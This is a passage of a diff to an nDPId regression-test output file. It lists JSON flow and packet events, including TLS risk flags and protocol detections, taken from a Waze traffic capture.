{"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":396,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879018,"flow_last_seen":1435587879855,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587879855,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA"}} +01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":398,"source":"waze.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587879018,"flow_last_seen":1435587879907,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2479,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":459,"midstream":0,"thread_ts_msec":1435587879907,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36314,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} +00939{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":400,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587879850,"flow_last_seen":1435587879958,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587879958,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01247{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":428,"source":"waze.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587879850,"flow_last_seen":1435587880568,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3491,"flow_tot_l4_payload_len":3673,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1435587880568,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"176.34.186.180","src_port":36316,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"39f74f5618836d3c5f7dcccc9f67ba75","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587880576,"flow_last_seen":1435587880576,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587880576,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.31","src_port":43991,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":432,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1435587880576,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1435587880576,"pkt":"ABoRAAACABoRAAABCABFAAA0U4FAAEAG6tYKECWdyKAEH6vXAFAtnZBdDlnt+YARAVu2DAAAAQEICgAIcK6K\/GDA"} 
00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":433,"source":"waze.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1435587880577,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587880577,"pkt":"ABoRAAACABoRAAABCABFAAAodUFAABAG+SLIoAQfChAlnQBQq9cOWe35LZ2QXlAQ\/\/9M8gAA"} 
@@ -169,59 +169,59 @@ 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1435587894241,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587894241,"pkt":"ABoRAAACABoRAAABCABFAAA87+5AAEAGZNsKCAABLjOtto0mAbvDfJnqAAAAAKAC\/\/\/\/twAAAgQFtAQCCAoACHYEAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":533,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1435587894244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAodXFAABAGD20uM622CggAAQG7jSY8g2YVw3yZ61AS\/\/86\/gAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1435587894244,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587894244,"pkt":"ABoRAAACABoRAAABCABFAAAo7+9AAEAGZO4KCAABLjOtto0mAbvDfJnrPINmFlAQ\/\/86\/wAA"} -00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": 
{"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587894241,"flow_last_seen":1435587894323,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587894323,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":537,"source":"waze.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587894241,"flow_last_seen":1435587894759,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3147,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":554,"midstream":0,"thread_ts_msec":1435587894759,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36134,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587898822,"flow_last_seen":1435587898822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587898822,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1435587898822,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587898822,"pkt":"ABoRAAACABoRAAABCABFAAA8qMZAAEAGamAKCAABbKiw5MaMAbuJft8IAAAAAKAC\/\/93xAAAAgQFtAQCCAoACHfOAAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1435587898824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAodXtAABAGzb9sqLDkCggAAQG7xox2gSD3iX7fCVAS\/\/+\/9AAA"} 
00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1435587898824,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587898824,"pkt":"ABoRAAACABoRAAABCABFAAAoqMdAAEAGanMKCAABbKiw5MaMAbuJft8JdoEg+FAQ\/\/+\/9QAA"} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":555,"source":"waze.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587898822,"flow_last_seen":1435587898874,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1435587898874,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"108.168.176.228","src_port":50828,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 
00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1435587905035,"flow_last_seen":1435587905035,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1435587905035,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":575,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1435587905035,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1435587905035,"pkt":"ABoRAAACABoRAAABCABFAAA82iNAAEAGeqYKCAABLjOtto0pAbvwXaAfAAAAAKAC\/\/\/IZgAAAgQFtAQCCAoACHo8AAAAAAEDAwg="} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":576,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1435587905038,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905038,"pkt":"ABoRAAACABoRAAABCABFAAAodYZAABAGD1guM622CggAAQG7jSkPol\/g8F2gIFAS\/\/86+wAA"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1435587905039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1435587905039,"pkt":"ABoRAAACABoRAAABCABFAAAo2iRAAEAGerkKCAABLjOtto0pAbvwXaAgD6Jf4VAQ\/\/86\/AAA"} 
-00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01089{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} -01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
+00938{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":578,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587905035,"flow_last_seen":1435587905111,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":182,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1435587905111,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01089{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":580,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1435587905035,"flow_last_seen":1435587905510,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1012,"flow_tot_l4_payload_len":1194,"flow_avg_l4_payload_len":199,"midstream":0,"thread_ts_msec":1435587905510,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA"}} +01343{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":582,"source":"waze.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1435587905035,"flow_last_seen":1435587905565,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2135,"flow_tot_l4_payload_len":3329,"flow_avg_l4_payload_len":416,"midstream":0,"thread_ts_msec":1435587905565,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"46.51.173.182","src_port":36137,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Waze","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.world.waze.com","ja3":"f392f120f1087cd2f8814539cf58cfa4","ja3s":"714ac86d50db68420429ca897688f5f3","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.world.waze.com","fingerprint":"30:50:FA:42:94:E4:1A:34:9B:23:55:CB:7B:F2:0D:76:FA:1C:58:4B"}} 
00648{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 00573{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1435587880580,"flow_last_seen":1435587880589,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.16.37.157","dst_ip":"200.160.4.49","src_port":52953,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":597,"source":"waze.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1435587868632,"flow_last_seen":1435587869162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1624,"flow_tot_l4_payload_len":3077,"flow_avg_l4_payload_len":181,"midstream":0,"thread_ts_msec":1435587907392,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"54.230.227.172","src_port":45529,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Waze","breed":"Acceptable","category":"Web"}} 
